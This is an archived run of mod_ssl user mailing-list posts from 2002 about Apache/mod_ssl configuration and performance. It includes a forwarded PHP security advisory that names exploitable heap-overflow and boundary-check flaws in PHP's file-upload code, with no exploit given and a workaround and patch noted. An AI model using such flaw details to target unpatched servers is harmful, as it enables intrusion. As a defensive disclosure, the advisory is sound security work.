en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hr.uoregon.edu id TAA16187; Fri, 1 Mar 2002 19:31:29 +0100 (MET) Received: from PCDAVIDRL (hugo.uoregon.edu [128.223.51.119]) by hr.uoregon.edu (8.11.6/8.11.6) with ESMTP id g21IVR814374 for ; Fri, 1 Mar 2002 10:31:27 -0800 From: "David Lechnyr" To: Subject: INSTALL doc reference to MM Shared Memory Library Date: Fri, 1 Mar 2002 10:31:17 -0800 Organization: Human Resources Message-ID: <000001c1c14f$46c94fe0$020a0a0a@PCDAVIDRL> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 In-reply-to: <3C7FC606.16426.208B390@localhost> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "David Lechnyr" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello all, I'm curious if anyone can provide any background on the reference in the INSTALL doc to the "MM Shared Memory Library" at http://www.engelschall.com/sw/mm/. I realize it's listed as optional, however it's still at version 1.1.3 (01-Jul-2000) and I'm a little concerned about it's interaction with other processes on modern kernels (2.4/2.5). Can anyone shed some light on this situation? Much appreciated, David Lechnyr david@hr.uoregon.edu Network Administrator (541) 346-2973 Human Resources, University of Oregon PGP http://hr.uoregon.edu/davidrl/pgp.key ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 19:45:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA17781; Fri, 1 Mar 2002 19:44:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id TAA17716; Fri, 1 Mar 2002 19:43:42 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 285A1BD2A; Fri, 1 Mar 2002 19:44:26 +0100 (CET) Date: Fri, 1 Mar 2002 19:44:26 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: INSTALL doc reference to MM Shared Memory Library Message-ID: <20020301184426.GA11790@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <3C7FC606.16426.208B390@localhost> <000001c1c14f$46c94fe0$020a0a0a@PCDAVIDRL> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <000001c1c14f$46c94fe0$020a0a0a@PCDAVIDRL> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, Mar 01, 2002 at 10:31:17AM -0800, David Lechnyr wrote: > I'm curious if anyone can provide any background on the reference in the > INSTALL doc to the "MM Shared Memory Library" at > http://www.engelschall.com/sw/mm/. I realize it's listed as optional, > however it's still at version 1.1.3 (01-Jul-2000) and I'm a little > concerned about it's interaction with other processes on modern kernels > (2.4/2.5). Can anyone shed some light on this situation? > It works fine even with newer kernels - anyway, the author of both mod_ssl and MM is Ralf Engelschall, so I'm sure that he'll keep MM updated if it needs to be - so far we don't get any complaints about MM on the list. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 23:08:33 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA09244; Fri, 1 Mar 2002 23:05:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id XAA09134; Fri, 1 Mar 2002 23:03:58 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 6EAC64CE69A; Fri, 1 Mar 2002 23:03:57 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g21M3e487319; Fri, 1 Mar 2002 23:03:40 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta06.mail.mel.aone.net.au id WAA07656; Fri, 1 Mar 2002 22:50:39 +0100 (MET) Received: from postgresql.org ([63.34.216.150]) by mta07.mail.mel.aone.net.au with ESMTP id <20020228113958.PYNW11125.mta07.mail.mel.aone.net.au@postgresql.org> for ; Thu, 28 Feb 2002 22:39:58 +1100 Message-ID: <3C7E168A.9F28448E@postgresql.org> Date: Thu, 28 Feb 2002 22:37:46 +1100 From: Justin Clift X-Mailer: Mozilla 4.78 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Advisory 012002: PHP remote vulnerabilities (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Justin Clift X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Jeff, Thanks heaps for the info. Passed it on to the PostgreSQL "General" mailing list, as lots of the people there use PHP too. :-) Regards and best wishes, Justin Clift SoilentG wrote: > > Thanks. One note. I use php 4.0.6 and I had to set > > file_uploads = 0 > > in order for it to take the value, setting it to "Off" showed "no value" in > phpinfo(); > > Jeff > > > -----Original Message----- > > From: owner-modssl-users@modssl.org > > [mailto:owner-modssl-users@modssl.org]On Behalf Of R. DuFresne > > Sent: Wednesday, February 27, 2002 4:28 PM > > To: modssl-users@modssl.org > > Subject: Advisory 012002: PHP remote vulnerabilities (fwd) > > > > > > > > Considering the plethroa of php users on the list, and the fact many are > > perhaps not reading bugtraq: > > > > ---------- Forwarded message ---------- > > From: security@e-matters.de > > Subject: Advisory 012002: PHP remote vulnerabilities > > Date: Wed, 27 Feb 2002 12:30:56 +0100 > > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org > > > > e-matters GmbH > > www.e-matters.de > > > > -= Security Advisory =- > > > > > > > > Advisory: Multiple Remote Vulnerabilites within PHP's fileupload code > > Release Date: 2002/02/27 > > Last Modified: 2002/02/27 > > Author: Stefan Esser [s.esser@e-matters.de] > > > > Application: PHP v3.10-v3.18, v4.0.1-v4.1.1 > > Severity: Several vulnerabilities in PHP's fileupload code allow > > remote compromise > > Risk: Critical > > Vendor Status: Patches Released > > Reference: http://security.e-matters.de/advisories/012002.html > > > > > > > > Overview: > > > > We found several flaws in the way PHP handles multipart/form-data POST > > requests. Each of the flaws could allow an attacker to execute > > arbitrary > > code on the victim's system. > > > > > > Details: > > > > PHP supports multipart/form-data POST requests (as described > > in RFC1867) > > known as POST fileuploads. Unfourtunately there are several > > flaws in the > > php_mime_split function that could be used by an attacker to execute > > arbitrary code. During our research we found out that not only PHP4 but > > also older versions from the PHP3 tree are vulnerable. > > > > > > The following is a list of bugs we found: > > > > PHP 3.10-3.18 > > > > - broken boundary check (hard to exploit) > > - arbitrary heap overflow (easy exploitable) > > > > PHP 4.0.1-4.0.3pl1 > > > > - broken boundary check (hard to exploit) > > - heap off by one (easy exploitable) > > > > PHP 4.0.2-4.0.5 > > > > - 2 broken boundary checks (one very easy and one hard to exploit) > > > > PHP 4.0.6-4.0.7RC2 > > > > - broken boundary check (very easy to exploit) > > > > PHP 4.0.7RC3-4.1.1 > > > > - broken boundary check (hard to exploit) > > > > > > Finally I want to mention that most of these vulnerabilities are > > exploitable only on linux or solaris. But the heap off by one is only > > exploitable on x86 architecture and the arbitrary heap overflow in > > PHP3 is exploitable on most OS and architectures. (This includes *BSD) > > > > Users running PHP 4.2.0-dev from cvs are not vulnerable to any of the > > described bugs because the fileupload code was completly rewritten for > > the 4.2.0 branch. > > > > > > Proof of Concept: > > > > e-matters is not going to release exploits for any of the discovered > > vulnerabilities to the public. > > > > > > Vendor Response: > > > > Because I am part of the php developer team there is not much I can > > write here... > > > > 27th February 2002 - An updated version of php and the patch for > > these vulnerabilities are now available at: > > http://www.php.net/downloads.php > > > > > > Recommendation: > > > > If you are running PHP 4.0.3 or above one way to workaround these > > bugs is to disable the fileupload support within your php.ini > > (file_uploads = Off) If you are running php as module keep in mind > > to restart the webserver. Anyway you should better install the > > fixed or a properly patched version to be safe. > > > > > > Sidenotice: > > > > This advisory is so short because I don't want to give out more info > > than is needed. > > > > Users running the developer version of php (4.2.0-dev) are not > > vulnerable to these bugs because the fileupload support was completly > > rewritten for that branch. > > > > > > GPG-Key: > > > > http://security.e-matters.de/gpg_key.asc > > > > pub 1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam > > Key fingerprint = 43DD 843C FAB9 832A E5AB CAEB 81F2 8110 75E7 AAD6 > > > > > > Copyright 2002 Stefan Esser. All rights reserved. > > > > > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- "My grandfather once told me that there are two kinds of people: those who work and those who take the credit. He told me to try to be in the first group; there was less competition there." - Indira Gandhi ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 23:56:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA12897; Fri, 1 Mar 2002 23:55:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from barabas.bitstream.net id XAA12886; Fri, 1 Mar 2002 23:55:02 +0100 (MET) Received: (qmail 8829 invoked from network); 1 Mar 2002 22:55:01 -0000 Received: from unknown (HELO peabody) (216.243.134.113) by barabas with SMTP; 1 Mar 2002 22:55:01 -0000 From: "Joe Robertson" To: Subject: mod_ssl, apache and sfio Date: Fri, 1 Mar 2002 16:54:57 -0600 Organization: Bitstream Underground Message-ID: <000d01c1c174$1c538fd0$7186f3d8@bisinc.net> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Joe Robertson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am attempting to build the latest mod_ssl with the latest apache on Solaris 2.7. The one caveat here is that we are experiencing the well known file descriptor problem with the vanilla build. To overcome this without having to purchase the Sun compiler and build for 32-bit, I have worked sfio into the system. Apache and sfio seem to play well together, but when I run httpd with the -DSSL flag I get bus errors. I continue to work on the problem, but does anyone out there have any thoughts? Thanks, Joe ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 2 00:33:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA16092; Sat, 2 Mar 2002 00:32:34 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from smtp1.ipin.com id AAA16070; Sat, 2 Mar 2002 00:31:58 +0100 (MET) Received: from belexc01.svc.nt.us.ipin.com (exchange1.dmz.us.ipin.com [10.10.0.21]) by smtp1.ipin.com (8.10.2/8.10.2) with ESMTP id g21NVpj02609 for ; Fri, 1 Mar 2002 15:31:52 -0800 (PST) Received: by BELEXC01 with Internet Mail Service (5.5.2653.19) id ; Fri, 1 Mar 2002 15:31:46 -0800 Message-ID: From: "Latif, Magid" To: modssl-users@modssl.org Subject: Apache-modSSL performance problems Date: Fri, 1 Mar 2002 15:31:46 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Latif, Magid" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Greetings all, I noticed a posting to the modssl-users list concerning performance figures of Apache-modSSL. I was wondering if you've came across any information in that regard. I am getting quite bad performance with apache-modSSL on a SPARC Solaris 8 platform. Iplanet is achieving 98 hits/second with versus 6.8 hits/second with apache-modssl on average. I am using a very simple test scenario using LoadRunner 7.02. See tests details below : Background: ----------- During performance tests I discovered a severe performance problem with Apache-modssl. The versions subjected to the tests were : Test Versions: ------------- apache-1.3.19-modSSL-2.8.3 without MM file-based SSL session caching. apache-1.3.19-modSSL-2.8.3 with MM and shared memory based SSL session caching. apache-1.3.23-modSSL-2.8.6 with MM and shared memory based SSL session caching. iplanet 6.0sp1-128bit - default (out of the box) configuration Test Platform: -------------- Webserver : SPARC Solaris 8 10/01 with latest patches installed Load generator: Pentium III 512MB, win2k, LoadRunner 7.02 - Emulating IE 5.5 Test Scenario: -------------- I created a simple load test scenario using LoadRunner. (version 7.02 on a 512MB PIII w/win2k) The scenario consists of accessing three static HTML pages. Those pages contain no images. Running the scenario with 3 concurrent users (loadrunner virtual users) resulted in the following : Test Results: ------------- + apache-1.3.19-modSSL-2.8.3-openSSL-0.9.6a without MM - Concurrent Users: 03 Running time : 11 minutes Hits/Second : 4.72 (average) Webserver load : 3.2 (average) + apache-1.3.19-modSSL-2.8.3-openSSL-0.9.6a with MM - Concurrent Users: 03 Running time: 11 minutes Hits/Second : 6.57 (average) Webserver load : 3.2 (average) + apache-1.3.23-modSSL-2.8.6-openSSL-0.9.6c with MM - Concurrent Users: 03 Running time: 11 minutes Hits/Second : 6.79 (average) + iplanet 6.0sp1-128bit - Concurrent Users: 03 Running time: 11 minutes Hits/Second : 98.2 (average) Webserver load : 4.2 (average) I turned off modSSL within the same apache configuration and increased the number of concurrent users in LoadRunner to 90. This resulted in a bit more than 170 hits/second. Therefore, I concluded that modSSL is having some severe performance problems. Perhaps I am missing some tuning parameters specific for modSSL ? Any input very welcome. Cheers, Magid. ================================= Magid Latif Systems Engineer iPIN 19 Davis Drive Belmont, CA 94002 Direct: +1 (650) 232 3704 Main: +1 (650) 232 3700 x3704 Fax: +1 (650) 232 5116 http://www.iPIN.com ===================================================================== Warning: All e-mail messages sent to or from this address are recorded by the iPIN corporate e-mail system and may be subject to archival and review. Furthermore, information in this e-mail may contain privileged or confidential information and is intended only for the recipient. If you receive this message in error, notify iPIN immediately by replying to this message and then deleting it from your computer. Any information in this e-mail doesn't necessarily reflect the views or opinions of iPIN. ====================================================================. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 2 06:31:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA01195; Sat, 2 Mar 2002 06:30:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta4-rme.xtra.co.nz id GAA01190; Sat, 2 Mar 2002 06:30:10 +0100 (MET) Received: from there ([210.86.53.53]) by mta4-rme.xtra.co.nz with SMTP id <20020302053002.XEVZ18867.mta4-rme.xtra.co.nz@there>; Sat, 2 Mar 2002 18:30:02 +1300 Content-Type: text/plain; charset="iso-8859-1" From: Geoff Thorpe To: modssl-users@modssl.org Subject: Re: Apache-modSSL performance problems Date: Sat, 2 Mar 2002 18:30:46 +1300 X-Mailer: KMail [version 1.3.1] References: In-Reply-To: MIME-Version: 1.0 Message-Id: <20020302053002.XEVZ18867.mta4-rme.xtra.co.nz@there> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id GAA01191 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Geoff Thorpe X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi there, I can recommend trying "swamp" for testing your servers, but that is (of course) a take-it-or-leave-it tip, no strings attached. http://www.geoffthorpe.net/crypto/swamp/ However, the README/FAQ files in that contain quite a bit of information on this subject that will help you if you read them. But let me throw you the relevant words, and allow you to work through them (and the information files) at your leisure; (a) cipher suites (esp. "EDH") (b) session caching (what resume behaviour are you getting on iplanet versus modssl?) (c) configuration (default config with modssl is not heavily optimised, eg. SSLLogLevel, "mime magic", "CompatEnvVars", etc may slow things down). Cheers, Geoff On Saturday 02 March 2002 12:31, Latif, Magid wrote: > Greetings all, > > I noticed a posting to the modssl-users list concerning performance > figures of Apache-modSSL. I was wondering if you've came across any > information in that regard. I am getting quite bad performance with > apache-modSSL on a SPARC Solaris 8 platform. > Iplanet is achieving 98 hits/second with versus 6.8 hits/second with > apache-modssl on average. > I am using a very simple test scenario using LoadRunner 7.02. See tests > details below : > > Background: > ----------- > During performance tests I discovered a severe performance problem with > Apache-modssl. The versions subjected to the tests were : > > Test Versions: > ------------- > apache-1.3.19-modSSL-2.8.3 without MM file-based SSL session caching. > apache-1.3.19-modSSL-2.8.3 with MM and shared memory based SSL session > caching. > apache-1.3.23-modSSL-2.8.6 with MM and shared memory based SSL session > caching. > iplanet 6.0sp1-128bit - default (out of the box) configuration > > Test Platform: > -------------- > Webserver : SPARC Solaris 8 10/01 with latest patches installed > Load generator: Pentium III 512MB, win2k, LoadRunner 7.02 - Emulating IE > 5.5 > > Test Scenario: > -------------- > I created a simple load test scenario using LoadRunner. (version 7.02 on > a 512MB PIII w/win2k) The scenario consists of accessing three static > HTML pages. Those pages contain no images. Running the scenario with 3 > concurrent users (loadrunner virtual users) resulted in the following : > > Test Results: > ------------- > + apache-1.3.19-modSSL-2.8.3-openSSL-0.9.6a without MM - Concurrent > Users: 03 > Running time : 11 minutes > Hits/Second : 4.72 (average) > Webserver load : 3.2 (average) > > + apache-1.3.19-modSSL-2.8.3-openSSL-0.9.6a with MM - Concurrent Users: > 03 Running time: 11 minutes > Hits/Second : 6.57 (average) > Webserver load : 3.2 (average) > > + apache-1.3.23-modSSL-2.8.6-openSSL-0.9.6c with MM - Concurrent Users: > 03 Running time: 11 minutes > Hits/Second : 6.79 (average) > > + iplanet 6.0sp1-128bit - Concurrent Users: 03 > Running time: 11 minutes > Hits/Second : 98.2 (average) > Webserver load : 4.2 (average) > > > I turned off modSSL within the same apache configuration and increased > the number of concurrent users in LoadRunner to 90. This resulted in a > bit more than 170 hits/second. Therefore, I concluded that modSSL is > having some severe performance problems. > > Perhaps I am missing some tuning parameters specific for modSSL ? > > Any input very welcome. > > Cheers, > > Magid. > > ================================= > Magid Latif > Systems Engineer > iPIN > 19 Davis Drive > Belmont, CA 94002 > Direct: +1 (650) 232 3704 > Main: +1 (650) 232 3700 x3704 > Fax: +1 (650) 232 5116 > http://www.iPIN.com > > > ===================================================================== > Warning: All e-mail messages sent to or from this address are recorded > by the iPIN corporate e-mail system and may be subject to archival and > review. Furthermore, information in this e-mail may contain privileged or > confidential information and is intended only for the recipient. If you > receive this message in error, notify iPIN immediately by replying to > this message and then deleting it from your computer. Any information in > this e-mail doesn't necessarily reflect the views or opinions of iPIN. > ====================================================================. > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 2 09:33:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA07624; Sat, 2 Mar 2002 09:32:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA07595; Sat, 2 Mar 2002 09:31:25 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 14CD44CE683; Sat, 2 Mar 2002 09:31:25 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2284YD98366; Sat, 2 Mar 2002 09:04:34 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from phyrstor-5vg3jm id CAA21949; Sat, 2 Mar 2002 02:54:29 +0100 (MET) Received: from [65.29.42.176] by phyrstor-5vg3jm (ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.80 (1.8.0.0)); Fri, 1 Mar 2002 19:55:53 -0600 Message-ID: <000801c1c18d$62ae1590$b02a1d41@phyrstor5vg3jm> From: "Nate Davis" To: Subject: Need help with configure.bat Date: Fri, 1 Mar 2002 19:55:51 -0600 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01C1C15B.1703BC30" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2479.0006 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Nate Davis" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C1C15B.1703BC30 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I am running apache under win2k... when i run the configure.bat file it = gives me an error saying "No Perl script found in input". That is with = the command line syntax of: configure --with-ssl=3Dc:/openssl = --with-apache=3D--with-apache=3DC:/Program Files/Apache Group/Apache any help someone could provide would be much apreciated, thanks - Nate ------=_NextPart_000_0005_01C1C15B.1703BC30 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
I am running apache under win2k... when = i run the=20 configure.bat file it gives me an error saying "No Perl script found in = input".=20 That is with the command line syntax of:
 
configure --with-ssl=3Dc:/openssl=20 --with-apache=3D--with-apache=3DC:/Program Files/Apache = Group/Apache
 
any help someone could provide would be = much=20 apreciated, thanks
 
- Nate
------=_NextPart_000_0005_01C1C15B.1703BC30-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 2 10:28:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA09702; Sat, 2 Mar 2002 10:27:06 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id KAA09695; Sat, 2 Mar 2002 10:26:50 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 3A8B7BD2A; Sat, 2 Mar 2002 10:27:36 +0100 (CET) Date: Sat, 2 Mar 2002 10:27:36 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: mod_ssl, apache and sfio Message-ID: <20020302092736.GB14094@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <000d01c1c174$1c538fd0$7186f3d8@bisinc.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <000d01c1c174$1c538fd0$7186f3d8@bisinc.net> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, Mar 01, 2002 at 04:54:57PM -0600, Joe Robertson wrote: > I am attempting to build the latest mod_ssl with the latest apache on > Solaris 2.7. The one caveat here is that we are experiencing the well > known file descriptor problem with the vanilla build. To overcome this > without having to purchase the Sun compiler and build for 32-bit, I have > worked sfio into the system. Apache and sfio seem to play well > together, but when I run httpd with the -DSSL flag I get bus errors. > > I continue to work on the problem, but does anyone out there have any > thoughts? > Perhaps this could help - http://www.science.uva.nl/pub/solaris/solaris2/Q3.45.html vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 2 13:37:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA17469; Sat, 2 Mar 2002 13:36:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chomsky.noc.de id NAA17448; Sat, 2 Mar 2002 13:36:01 +0100 (MET) Received: from [] (IDENT:jlehrke@chomsky.noc.de [192.168.10.2]) (authenticated bits=0) by chomsky.noc.de (8.12.1/8.12.1) with ESMTP id g22Ca0FL018257 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Sat, 2 Mar 2002 13:36:01 +0100 Date: Sat, 02 Mar 2002 13:35:56 +0100 From: Joerg Lehrke To: modssl-users@modssl.org Subject: Problems with apache+ mod_ssl on Solaris 8 Message-ID: <42330000.1015072556@localhost> X-Mailer: Mulberry/2.2.0b2 (Linux/x86) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joerg Lehrke X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I'm running apache-1.3.23+mod_ssl-2.8.7 compiled with mm-1.1.3 on Solaris 8. The machine has the recommended patches (Jan/18/02) for Solaris 8 applied and the semaphore relevant entries on the machine in /etc/system are: set semsys:seminfo_semmns=410 set semsys:seminfo_semmni=70 set semsys:seminfo_semmsl=210 set semsys:seminfo_semopm=100 set semsys:seminfo_semvmx=32767 I'm running two Apache instances, one on port 80/443 and the other instance on 82/445. I found that especially IE5.x can break the running apache at port 445 first partly (only this client is not getting the request) and finally even total (no further request is served). I'm using SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL Whenever the problem occurs, the system is running out of semaphores or something related, because an application using a semaphore produces warnings during semaphore operations (No space left on device) after a few requests from IE to apache. This seems to be the reason for the total breakdown of Apache, too. Has anyone observed a similar behavior and maybe a solution to the problem? Cheers! - -- Joerg Lehrke GnuPG-KeyID: C66844AC The Knoc http://k.noc.de/ Bgm.-Haffner-Str. 7, D-87600 Kaufbeuren, Germany Tel +49 8341 874647 GNU -- Protect your freedom! -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE8gMcwqBmc6cZoRKwRAk4SAKCpIlLqVrjdh9yXoCOkpMk4KgLsAQCgrL5d 3JxwJxiKkCcNtJ0hbHkIdOE= =UuDG -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 2 13:57:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA18024; Sat, 2 Mar 2002 13:56:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailgate5.cinetic.de id NAA18002; Sat, 2 Mar 2002 13:55:37 +0100 (MET) From: torsten-f-klein@web.de Received: from web.de (fmomail02.dlan.cinetic.de [172.20.1.46]) by mailgate5.cinetic.de (8.11.2/8.11.2/SuSE Linux 8.11.0-0.4) with SMTP id g22CtSv32263 for modssl-users@modssl.org; Sat, 2 Mar 2002 13:55:32 +0100 Date: Sat, 2 Mar 2002 13:55:32 +0100 Message-Id: <200203021255.g22CtSv32263@mailgate5.cinetic.de> MIME-Version: 1.0 Organization: http://freemail.web.de/ To: modssl-users@modssl.org Subject: ssl, apache proxypass and cookies Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: torsten-f-klein@web.de X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hello everyone, i've got a little problem with proxypass, cookies and ssl. set up: client A is connected via https to host B. host B sets a cookie on client A and initiates a redirect to URL1. the client sends this redirect to host B and - due to the proxypass configuration - URL1 is translated by apache proxypass to URL2. question: does anyone know if the cookie is submittet by apache proxypass between hosts A and B although they reside in different domains. many thanks in advance for your support, --torsten ________________________________________________________________ Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 2 15:09:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA21467; Sat, 2 Mar 2002 15:08:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id PAA21457; Sat, 2 Mar 2002 15:08:00 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g22E7Ov29588 for ; Sat, 2 Mar 2002 14:07:44 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Sat, 2 Mar 2002 14:07:20 -0000 